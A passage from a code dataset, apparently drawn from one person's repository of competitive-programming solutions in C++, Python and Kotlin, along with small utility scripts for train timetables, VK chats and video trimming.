<bits/stdc++.h>\n\n#define fori(n) for(int i = 0; i < (int) (n); i++)\n#define forj(n) for(int j = 0; j < (int) (n); 
j++)\n\nusing namespace std;\n\nclass ModModMod \n{\n set<int> ss;\n long long f(long long x)\n {\n auto temp = ss.lower_bound(-x);\n if (temp == ss.end())\n return x;\n return f(x % (-*temp));\n }\npublic:\n long long findSum(vector <int> m, int R) \n {\n int n = m.size();\n long long ans = 0;\n int last = m[0];\n ss.insert(-last);\n for (int i = 1; i < n; ++i)\n if (m[i] < last)\n ss.insert(-m[i]),\n last = m[i];\n fori(R + 1)\n ans += f(i);\n return ans;\n }\n};\n" }, { "alpha_fraction": 0.5, "alphanum_fraction": 0.5379746556282043, "avg_line_length": 30.600000381469727, "blob_id": "a5d5841100b892aab5b61839da11821d91c3feab", "content_id": "600db576399134a1f22d6eca3f274bf240c2998b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 158, "license_type": "no_license", "max_line_length": 60, "num_lines": 5, "path": "/CodeForce/0847/M.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "input()\na = list(map(int, input().split()))\ndiffs = [a[n] - a[n - 1] for n in range(1, len(a))]\n\nprint((a[-1] + diffs[0]) if len(set(diffs)) == 1 else a[-1])\n" }, { "alpha_fraction": 0.5411442518234253, "alphanum_fraction": 0.5490464568138123, "avg_line_length": 43.350467681884766, "blob_id": "3d30340775de8a755b37518aa10f250c0e1a53fa", "content_id": "062f25e1110fdb8e10d1e89174dbe49f39fddc51", "detected_licenses": [ "WTFPL" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10010, "license_type": "permissive", "max_line_length": 417, "num_lines": 214, "path": "/timetable/timetable", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n\nimport click\nimport click_completion\nimport click_completion.core\n\nfrom collections import defaultdict\nimport re\nimport sys\nimport os\nimport getopt\nimport requests\nimport subprocess\nimport datetime\n\nDATE_FORMAT = '%d.%m.%Y'\nPATH = 
os.path.dirname(os.path.abspath(__file__))\nclick_completion.init()\n\[email protected]()\ndef completion():\n pass\n\[email protected]()\[email protected]('--append/--overwrite', help=\"Append the completion code to the file\", default=None)\[email protected]('-i', '--case-insensitive/--no-case-insensitive', help=\"Case insensitive completion\")\[email protected]('shell', required=False, type=click_completion.DocumentedChoice(click_completion.core.shells))\[email protected]('path', required=False)\ndef install(append, case_insensitive, shell, path):\n shell, path = click_completion.core.install(shell=shell, path=path, append=append)\n click.echo('%s completion installed in %s' % (shell, path))\n\nclass dotdict(dict):\n __getattr__ = dict.get\n __setattr__ = dict.__setitem__\n __delattr__ = dict.__delitem__\n \ndef getStations():\n file = open(os.path.join(PATH, 'stations.in'), 'r')\n stationById = defaultdict(list)\n idByStation = defaultdict(list)\n all = []\n for string in file:\n l = string[:-1].rsplit(' ', 1)\n stationById[l[1]].append(l[0])\n idByStation[l[0]].append(l[1])\n all.append(l[0])\n file.close()\n return stationById, idByStation, all\n\ndef getMins(date):\n return int(date[0:2]) * 60 + int(date[3:5])\n\ndef getDate(mins):\n hours = mins // 60\n mins %= 60\n res = ''\n if hours != 0: res += str(hours) + ' ч'\n if mins != 0: res += str(mins) + ' м'\n return re.sub(r'ч(\\d)', r'ч \\1', res)\n\ndayReplacers = [ ('по пятницам и выходным', 'ПСВ'), ('по пятницам и воскресеньям', 'ПВ'), ('по пятницам и субботам', 'ПС'), ('ежедневно', ''), ('по выходным', 'СВ'), ('по рабочим', 'КСВ'), ('по воскресеньям', 'В'), ('по субботам', 'С'), ('по пятницам', 'П'), ('кроме пятн\\. 
и субб\\.', 'КПС'), ('кроме пятниц и вых\\.', 'КПСВ'), ('кроме четвергов и вых\\.', 'КЧСВ'), ('кроме суббот', 'КС'), ('кроме воскресений', 'КВ') ]\nplaceReplacers = [ ('Красное Село', 'КрСело'), ('Лигово', ''), ('Калище', ''), ('Лебяжье', ''), ('Ораниенбаум-1', ''), ('Новый Петергоф', ''), ('Гатчина Балтийская', 'Г'), ('Гатчина Варшавская', 'Г'), ('Зеленогорск', 'Зел'), ('Кирилловское', 'Кир'), ('Каннельярви', 'Кан'), ('Рощино', 'Рощ'), ('Выборг', 'Выб'), ('Гаврилово', 'Гав'), ('Советский', 'Сов'), (r'Санкт-Петербург-.*?(\\s|$)', r'\\1') ]\ndaysSorter = { '': 0, 'К': 1, 'П': 2, 'С': 3, 'В': 4 }\n\ndef replacer(s, repl):\n for what, how in repl: s = re.sub(what, how, s)\n return s\n\ndef getTimetable(fro, to, date):\n for idFrom in fro:\n for idTo in to:\n try:\n x = requests.get('https://www.tutu.ru/spb/rasp.php?st1={}&st2={}&json&date={}'.format(idFrom, idTo, date)).json()\n if 'error' in x:\n print(x['error'], file = sys.stderr)\n else:\n return x\n except:\n print('No route from {} to {}'.format(idFrom, idTo))\n raise Exception('No route found:(')\n\ndef parse(directory, fro, to, date, full, collapse, remove, st = getStations()):\n stationById, idByStation, _ = st\n x = getTimetable(idByStation[fro], idByStation[to], date)\n\n filename = directory + stationById[x['dep-st']][0] + '—' + stationById[x['arr-st']][0]\n if not (x['dat'] is None):\n filename += ', ' + x['dat']\n filename = re.sub(r'(Санкт-Петербург)-.*?\\.', r'\\1', filename)\n sys.stdout = open(filename + '.out', 'w')\n\n trains = []\n for y in x['tra-list']:\n train = dotdict(\n departure = y['tra']['dep']['tim'],\n arrival = y['tra']['arr']['tim'],\n fro = stationById[y['tra']['dep']['st']][0],\n to = stationById[y['tra']['arr']['st']][0],\n schedule = replacer(y['tra']['sch'], dayReplacers),\n type = '★' if y['tra']['typ'] == 'Ласточка' else '',\n minutes = getMins(y['tra']['tr-tim']),\n change = y['tra']['cha'].replace('. 
Уточните дату поездки', ''),\n skip = False\n )\n if train.schedule.find('отменен') != -1:\n continue\n trains.append(train)\n\n trains = sorted(trains, key = lambda x: (x.departure, daysSorter[x.schedule[:1].upper()]))\n averageTime = sum(map(lambda train: train.minutes, trains)) / len(trains)\n for train in trains:\n if full:\n train.time = getDate(train.minutes)\n else:\n if len(trains) > 10 and train.minutes + 4 < averageTime:\n train.time = '' if remove else getDate(train.minutes).replace(' ', '')\n elif train.minutes - 10 > averageTime:\n train.time = getDate(train.minutes)\n train.skip = True\n else:\n train.time = ''\n train.skip = train.type == '★'\n\n if remove: trains = list(filter(lambda train: not train.skip, trains))\n\n sameDep, sameDst = True, True\n if collapse:\n trains2 = []\n lastTime, lastDep = 0, 0\n for train in trains:\n if train.departure == lastDep and abs(train.minutes - lastTime) <= 2 and collapse:\n trains2[-1].fro += '/' + train.fro\n trains2[-1].to += '/' + train.to\n trains2[-1].schedule += '/' + train.schedule\n trains2[-1].type += '/' + train.type\n else:\n trains2.append(train)\n lastDep, lastTime = train.departure, train.minutes\n trains = trains2\n\n for train in trains:\n if not full:\n train.time = train.type + ' ' + train.time\n train.time = re.sub(r'^\\s*(.*?)\\s*$', r'\\1', train.time)\n train.fro = replacer(train.fro, placeReplacers)\n train.to = replacer(train.to, placeReplacers)\n\n train.fro = re.sub(r'^(\\w+)(/\\1)+$', r'\\1', train.fro)\n train.to = re.sub(r'^(\\w+)(/\\1)+$', r'\\1', train.to)\n train.time = re.sub(r'^\\s*/*\\s*$', '', train.time)\n train.fro = re.sub(r'^\\s*/*\\s*$', '', train.fro)\n train.to = re.sub(r'^\\s*/*\\s*$', '', train.to)\n if train.fro == '' and train.to == '' and (train.schedule == 'КСВ/СВ' or train.schedule == 'СВ/КСВ'): train.schedule = ''\n train.time = re.sub('^/', '❤/', train.time)\n train.time = re.sub('/$', '/❤', train.time)\n train.time = re.sub('//', '/❤/', train.time)\n for i in 
range(1, len(trains)):\n sameDep = sameDep and (trains[i].fro == trains[i - 1].fro)\n sameDst = sameDst and (trains[i].to == trains[i - 1].to )\n\n if full:\n fields = ['departure', 'arrival', 'schedule', 'type', 'time', 'fro', 'to', 'change']\n else:\n fields = ['departure', 'schedule', 'time']\n if not sameDep:\n fields.append('fro')\n if not sameDst:\n fields.append('to')\n\n resultedFields = []\n for f in fields:\n isNeeded = False\n for train in trains:\n isNeeded = isNeeded or train[f] != ''\n if isNeeded:\n resultedFields.append(f)\n\n for train in trains:\n print('\\t'.join(map(lambda f: train[f], resultedFields)))\n\n sys.stdout.close()\n subprocess.Popen(['mousepad', filename + '.out'])\n\[email protected]()\[email protected]('-d', '--date', type=click.DateTime(formats=[DATE_FORMAT]), help='load timetable for date=DATE')\[email protected]('-o', '--directory', type=click.Path(file_okay=False), help='output directory for timetable files', default='~/.cache/timetable')\[email protected]('-t', '--today', is_flag=True, help='load timetable for today', default=False)\[email protected]('-m', '--tomorrow', is_flag=True, help='load timetable for tomorrow', default=False)\[email protected]('-f', '--full', is_flag=True, help='do not minify', default=False)\[email protected]('-c', '--collapse', is_flag=True, help='do not collapse trains with same departure time', default=True)\[email protected]('-r', '--remove', is_flag=True, help='remove slow trains and normal lastochkas', default=True)\[email protected]('stations', type=click.Choice(getStations()[2], case_sensitive=False), required=True, nargs=-1)\ndef load(stations, directory, today, tomorrow, date, full, collapse, remove):\n if directory[-1] != os.sep:\n directory += os.sep\n if directory[0] == '~':\n directory = os.path.expanduser('~') + directory[1:]\n date = 'all' if date is None else date.strftime(DATE_FORMAT)\n if today:\n date = datetime.date.today().strftime(DATE_FORMAT)\n if tomorrow:\n date = 
(datetime.date.today() + datetime.timedelta(days = 1)).strftime(DATE_FORMAT)\n click.echo('Получаю расписание на ' + date)\n if full:\n collapse = False\n if len(stations) % 2 == 1:\n raise click.ClickException('Count of stations must be even')\n os.makedirs(directory, exist_ok=True)\n for i in range(0, len(stations), 2):\n parse(directory, stations[i], stations[i + 1], date, full, collapse, remove)\n\nif __name__ == \"__main__\":\n completion()\n" }, { "alpha_fraction": 0.45622119307518005, "alphanum_fraction": 0.4746543765068054, "avg_line_length": 24.52941131591797, "blob_id": "0f57bc65e5a392503dcd89fbe9b71aa236b52572", "content_id": "3200f1dd72cd53b94dea140cdfa79c4da67c2a59", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 434, "license_type": "no_license", "max_line_length": 105, "num_lines": 17, "path": "/CodeForce/0952/B.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import sys\n\ncc = 0\n\nfor i in range(10):\n print(i)\n sys.stdout.flush()\n answer = input()\n fi = answer[:2]\n if answer == 'no':\n cc += 1\n if answer[-2:] == 'so' or answer == 'not bad' or answer == 'cool' or cc == 4 or fi == 'gr':\n print('normal')\n break\n if answer[-2:] == 'en' or answer == 'no way' or fi == 'te' or fi == 'wo' or fi == 'ar' or fi == 'go':\n print('grumpy')\n break\n" }, { "alpha_fraction": 0.3821656107902527, "alphanum_fraction": 0.5031847357749939, "avg_line_length": 25.16666603088379, "blob_id": "19d1ffd82b3a346b36a08fb2d785bb326b2cea8c", "content_id": "878aac92595264126309800ef793b7b1766dee98", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 157, "license_type": "no_license", "max_line_length": 39, "num_lines": 6, "path": "/CodeForce/gym/101090/J.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "n = int(input())\nn2 = n // 2\nn12 = (n + 1) // 2\nalleven = n2 * (n2 - 1) * (n2 - 2) // 6\nevennoteven = n2 * n12 * 
(n12 - 1) // 2\nprint(alleven + evennoteven)\n" }, { "alpha_fraction": 0.49425286054611206, "alphanum_fraction": 0.5287356376647949, "avg_line_length": 42.5, "blob_id": "ec27baed766677685ea779ea5f337a1d56be960d", "content_id": "310fae23e79e849b66c9590a5f88c7150db496ae", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 87, "license_type": "no_license", "max_line_length": 69, "num_lines": 2, "path": "/2020/bguirQual/A.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "n = int(input())\nprint('Yes' if len(bin(n).replace('0', '')) == 2 and n > 1 else 'No')\n" }, { "alpha_fraction": 0.523598849773407, "alphanum_fraction": 0.5435103178024292, "avg_line_length": 27.25, "blob_id": "47a1d66be4b94d51ac543685b3def6ba96cee136", "content_id": "1208f8cd2bdbea803bf778cd706f4f5dbe110510", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 5424, "license_type": "no_license", "max_line_length": 174, "num_lines": 192, "path": "/CodeForce/0617/E2.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) 
int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//MO\ninline ll hilbertOrder(int x, int y, int pow, int rotate = 0) {\n if (pow == 0) {\n return 0;\n }\n int hpow = 1 << (pow-1);\n int seg = (x < hpow) ? (\n (y < hpow) ? 0 : 3\n ) : (\n (y < hpow) ? 1 : 2\n );\n seg = (seg + rotate) & 3;\n const int rotateDelta[4] = {3, 0, 0, 1};\n int nx = x & (x ^ hpow), ny = y & (y ^ hpow);\n int nrot = (rotate + rotateDelta[seg]) & 3;\n ll subSquareSize = ll(1) << (2*pow - 2);\n ll ans = seg * subSquareSize;\n ll add = hilbertOrder(nx, ny, pow-1, nrot);\n ans += (seg == 1 || seg == 2) ? 
add : (subSquareSize - add - 1);\n return ans;\n}\n\ntemplate<typename S, typename T>\nstruct MO\n{\n int n;\n int w;\n int q = 0;\n vector<tuple<ll, int, int, int, T>> queries;\n vector<S> answers;\n\n const void f(const int&);\n void (*addLeft)(const int&);\n void (*addRight)(const int&);\n void (*delLeft)(const int&);\n void (*delRight)(const int&);\n S (*getAnswer)(const int&, const int&, const T&);\n\n void addQuery(int l, int r, const T& t) {\n queries.push_back({hilbertOrder(l, r, w), l, r, q++, t});\n }\n\n MO(unsigned int maxN,\n void addLeft(const int&),\n void addRight(const int&),\n void delLeft(const int&),\n void delRight(const int&),\n S getAnswer(const int&, const int&, const T&)\n ) {\n n = maxN;\n w = bit_width(maxN);\n this->addLeft = addLeft;\n this->addRight = addRight;\n this->delLeft = delLeft;\n this->delRight = delRight;\n this->getAnswer = getAnswer;\n }\n\n vector<S> go(\n ) {\n answers.resize(q);\n sort(all(queries), [&](const auto& a, const auto& b) {\n return get<0>(a) < get<0>(b);\n });\n\n int L = 0;\n int R = -1;\n\n for (int i = 0; i < q; ++i)\n {\n const auto& [_, l, r, id, t] = queries[i];\n while (L > l) addLeft(--L);\n while (R < r) addRight(++R);\n while (L < l) delLeft(L++);\n while (R > r) delRight(R--);\n answers[id] = getAnswer(l, r, t);\n }\n return answers;\n }\n};\n\n\n//}}}\n\nstatic const int N = 100'005;\nint lefts[1 << 20];\nint rights[1 << 20];\nint sums[N];\nint a[N];\nll answer = 0;\nint n, m, k;\n\ninline void addLeft(const int& x) {\n ++lefts[sums[x]];\n ++rights[sums[x + 1]];\n answer += rights[k ^ sums[x]];\n}\n\ninline void addRight(const int& x) {\n ++lefts[sums[x]];\n ++rights[sums[x + 1]];\n answer += lefts[k ^ sums[x + 1]];\n}\n\ninline void delLeft(const int& x) {\n answer -= rights[k ^ sums[x]];\n --lefts[sums[x]];\n --rights[sums[x + 1]];\n}\n\ninline void delRight(const int& x) {\n answer -= lefts[k ^ sums[x + 1]];\n --lefts[sums[x]];\n --rights[sums[x + 1]];\n}\n\nll getAnswer(const int& l, const 
int& r, const int&) {\n return answer;\n}\n\nvoid run()\n{\n readln(n, m, k);\n fori(n)\n readln(a[i]);\n sums[0] = 1;\n fori(n) sums[i + 1] = sums[i] ^ a[i];\n\n int l, r;\n MO<ll, int> mo(n, addLeft, addRight, delLeft, delRight, getAnswer);\n fori(m)\n readln(l, r),\n mo.addQuery(--l, --r, 0);\n\n auto ans = mo.go();\n fori(m)\n writeln(ans[i]);\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.5390625, "alphanum_fraction": 0.5390625, "avg_line_length": 20.16666603088379, "blob_id": "a4d4443de8cadb843563f5178358482f931e7136", "content_id": "651bb8a622fadf64c9500d5ccdc0aaf8a59e6f54", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 128, "license_type": "no_license", "max_line_length": 40, "num_lines": 6, "path": "/2016/yalgo/A.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import re\ns = input()\n\nc = re.sub(r'[aeiouy]', '', s)\nv = re.sub(r'[^aeiouy]', '', s)\r\nprint('Vowel' if c < v else 'Consonant')\n" }, { "alpha_fraction": 0.4930991232395172, 
"alphanum_fraction": 0.5156838297843933, "avg_line_length": 28.962406158447266, "blob_id": "e4972d732d32110e1743a23e721aa1e356784f74", "content_id": "d90264af4ffc53f87f3e11db0381fbc476d85152", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3985, "license_type": "no_license", "max_line_length": 174, "num_lines": 133, "path": "/CodeForce/1783/E.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n#ifdef ONLINE_JUDGE\n#pragma GCC target(\"avx2,bmi,bmi2,lzcnt,popcnt\")\n#endif\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... 
args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//downTree\n//0-indexed, [l..r)\ntemplate<typename T, typename F>\nstruct downTree {\n F f;\n vector<T> t;\n int n;\n\n downTree(int sz, const F &g, T defaultValue = T()) : f(g)\n {\n n = 1;\n while (n < sz) n <<= 1;\n t.resize(n * 2, defaultValue);\n }\n\n downTree(vector<T> &a, const F &g, T defaultValue = T()) : downTree(a.size(), g, defaultValue)\n {\n for (int i = 0; i < SZ(a); ++i)\n t[i + n] = a[i];\n for (int i = n - 1; i >= 1; --i)\n t[i] = f(t[i << 1], t[i << 1 | 1]);\n }\n\n void update(int i, const T& x)\n {\n i += n;\n t[i] = f(t[i], x);\n for (i >>= 1; i > 1; i >>= 1)\n t[i] = f(t[i << 1], t[i << 1 | 1]);\n }\n\n T get(int l, int r)\n {\n T resL = t[0];\n T resR = t[0];\n l += n;\n r += n;\n while (l < r)\n {\n if (l & 1)\n resL = f(resL, t[l++]);\n if (r & 1)\n resR = f(t[--r], resR);\n l >>= 1;\n r >>= 1;\n }\n return f(resL, resR);\n }\n};\n\n\n//}}}\n\nvoid run()\n{\n ints(n);\n vi a(n), b(n);\n readln(a, b);\n vector<int> c(n * 2 + 5);\n fori(n)\n c[b[i]] = max(c[b[i]], a[i]);\n downTree tree(c, [&](const int& a, const int& b) { return max(a, b); }, 0);\n\n vector<int> ans;\n for (int k = 1; k <= n; ++k)\n {\n bool can = true;\n for (int i = 1, poly = 1, mono = k; i <= 2 * n; i += k * 2, poly += k, mono += k)\n can &= tree.get(poly, min(n + 1, poly + k)) <= mono;\n if (can)\n ans.pb(k);\n }\n\n writeln(ans.size());\n writeln(ans);\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false); cin.tie(0);\n ints(t); fori(t) run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T 
const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.559374988079071, "alphanum_fraction": 0.628125011920929, "avg_line_length": 34.55555725097656, "blob_id": "9b36408ab3d05f675d37e27afe20e15a57827a05", "content_id": "d5118235d00279b0f80e7b6861be41df890c73be", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 343, "license_type": "no_license", "max_line_length": 76, "num_lines": 9, "path": "/scripts/vkChats.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "from vk import vk\n\nchats = vk('messages.getChat', chat_ids = ','.join(map(str, range(1, 82))))\nnames = []\nfor chat in chats:\n if set([53321, 3167759, 3586834]) == set(chat.users):\n names.append(chat['title'])\nprint('Всего чатов: {}, чатов с Антоном: {}'.format(len(chats), len(names)))\nprint('\\n'.join(names))\n" }, { "alpha_fraction": 0.4442065954208374, "alphanum_fraction": 0.4616002142429352, "avg_line_length": 28.42519760131836, "blob_id": "6a4c77e17f4bf014bceb20c39308fc25b34d1197", "content_id": "b7b57e730fc659a6d0efd1b613197843a372ac14", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 3737, "license_type": "no_license", "max_line_length": 131, "num_lines": 127, "path": "/CodeForce/1346/G.kt", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import java.io.PrintWriter// {{{\nimport kotlin.math.*\nimport kotlin.collections.*// }}}\n\nprivate fun run() {\n tailrec fun gcd(a: 
Int, b: Int): Int {\n return if (b == 0) a else gcd(b, a % b)\n }\n\n val (n, k) = readln()\n val p = readln()\n val a = readln()\n if (k == 2) {\n writeln(\"YES\")\n writeln(a[0], p.first())\n writeln(a[1], p.first())\n return\n }\n\n fun check(first: Int, second: Int): Pair<Pair<Int, Int>, Pair<Int, Int>> {\n var no = Pair(Pair(-1, -1), Pair(-1, -1))\n\n var s1 = first\n for (d1 in p)\n if ((second - s1) % d1 == 0) {\n var s2 = -1\n var last = -1\n var g = 0\n for (x in a)\n if ((x - s1) % d1 != 0) {\n if (last != -1)\n g = gcd(g, x - last)\n else\n s2 = x\n last = x\n }\n\n if (last == -1) // Empty\n return Pair(Pair(s1, d1), Pair(a[0], p.first()))\n if (g == 0) // One left\n return Pair(Pair(s1, d1), Pair(last, p.first()))\n for (d2 in p) // More than one left\n if (g % d2 == 0)\n return Pair(Pair(s1, d1), Pair(s2, d2))\n }\n return no\n }\n\n var os = check(a[0], a[1])\n if (os.first.first != -1) {\n writeln(\"YES\")\n writeln(os.first.first, os.first.second);\n writeln(os.second.first, os.second.second);\n return\n }\n os = check(a[0], a[2])\n if (os.first.first != -1) {\n writeln(\"YES\")\n writeln(os.first.first, os.first.second);\n writeln(os.second.first, os.second.second);\n return\n }\n os = check(a[1], a[2])\n if (os.first.first != -1) {\n writeln(\"YES\")\n writeln(os.first.first, os.first.second);\n writeln(os.second.first, os.second.second);\n return\n }\n writeln(\"NO\")\n}\n\nprivate fun PrintWriter.readSolveWrite() {\n val t = 1\n for (q in 1..t) {\n run()\n }\n}\n\nprivate fun ok(x: Boolean) = if (x) 1 else 0// {{{\n\nprivate fun writeln(vararg strings: Any) = println(strings.map{if (it is IntArray) it.joinToString(\" \") else it}.joinToString(\" \"))\n\nprivate fun readln() = getIntArray()\n\nprivate fun getIntArray() = readLine()!!.splitToIntArray()\n\nprivate fun bufferOut(block: PrintWriter.() -> Unit) = PrintWriter(System.out).use { block(it) }\n\ndata class Pt(val x: Int, val y: Int, val i: Int, var ans: Int)\n\nfun main() = bufferOut { 
readSolveWrite() }\n\nprivate fun String.splitToIntArray(): IntArray {\n val n = length\n if (n == 0) return IntArray(0) // EMPTY\n var res = IntArray(4)\n var m = 0\n var i = 0\n while (true) {\n var cur = 0\n var neg = false\n var c = get(i) // expecting number, IOOB if there is no number\n if (c == '-') {\n neg = true\n i++\n c = get(i) // expecting number, IOOB if there is no number\n }\n while (true) {\n val d = c.toInt() - '0'.toInt()\n require(d in 0..9) { \"Unexpected character '$c' at $i\" }\n require(cur >= Integer.MIN_VALUE / 10) { \"Overflow at $i\" }\n cur = cur * 10 - d\n require(cur <= 0) { \"Overflow at $i\" }\n i++\n if (i >= n) break\n c = get(i)\n if (c == ' ') break\n }\n if (m >= res.size) res = res.copyOf(res.size * 2)\n res[m++] = if (neg) cur else (-cur).also { require(it >= 0) { \"Overflow at $i\" } }\n if (i >= n) break\n i++\n }\n if (m < res.size) res = res.copyOf(m)\n return res\n}// }}}\n" }, { "alpha_fraction": 0.5809524059295654, "alphanum_fraction": 0.5941392183303833, "avg_line_length": 35.878379821777344, "blob_id": "55536fb469fbe6f8164c82159348fadc7e404504", "content_id": "af593fdf7a588a9033982f5531739a0d33ecc118", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2730, "license_type": "no_license", "max_line_length": 127, "num_lines": 74, "path": "/scripts/trimVideo.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n\nimport re\nimport os.path\nimport argparse\nimport sys\nimport subprocess\n\ndef getTime(kwargs):\n since = kwargs.since\n if kwargs.duration != None:\n return '-ss {0} -t {1}'.format(since, kwargs.duration)\n if kwargs.till != None:\n return '-ss {0} -to {1}'.format(since, kwargs.till)\n return '-ss {}'.format(since)\n\ndef fileExists(path):\n return os.path.exists(path)\n\ndef isUrl(url):\n ok = re.match(r'http://youtube.com/watch\\?((?:v=|\\/)([0-9A-Za-z_-]{11}).*)', url) != None or \\\n 
re.match(r'https://www.youtube.com/watch\\?((?:v=|\\/)([0-9A-Za-z_-]{11}).*)', url) != None or \\\n fileExists(url)\n if ok:\n return url\n raise argparse.ArgumentTypeError('{0} is not correct youtube url'.format(url))\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-s', '--since', dest = 'since', type = str, default = '0' )\nparser.add_argument('-t', '--till', dest = 'till', type = str )\nparser.add_argument('-d', '--duration', dest = 'duration', type = str )\nparser.add_argument('-o', '--output', dest = 'output', type = str )\nparser.add_argument('-v', '--verbose', dest = 'verbose', action = 'store_true' )\nparser.add_argument('url', type = isUrl )\n\nargs = parser.parse_args()\ntime = getTime(args)\n\nFFMPEG = 'ffmpeg -i \"{0}\" {1} -acodec aac -b:a 192k -avoid_negative_ts make_zero \"{2}\"'\nFFMPEGAUDIO = 'ffmpeg -i \"{0}\" {1} -i \"{2}\" {1} -acodec aac -b:a 192k -avoid_negative_ts make_zero -map 0:v:0 -map 1:a:0 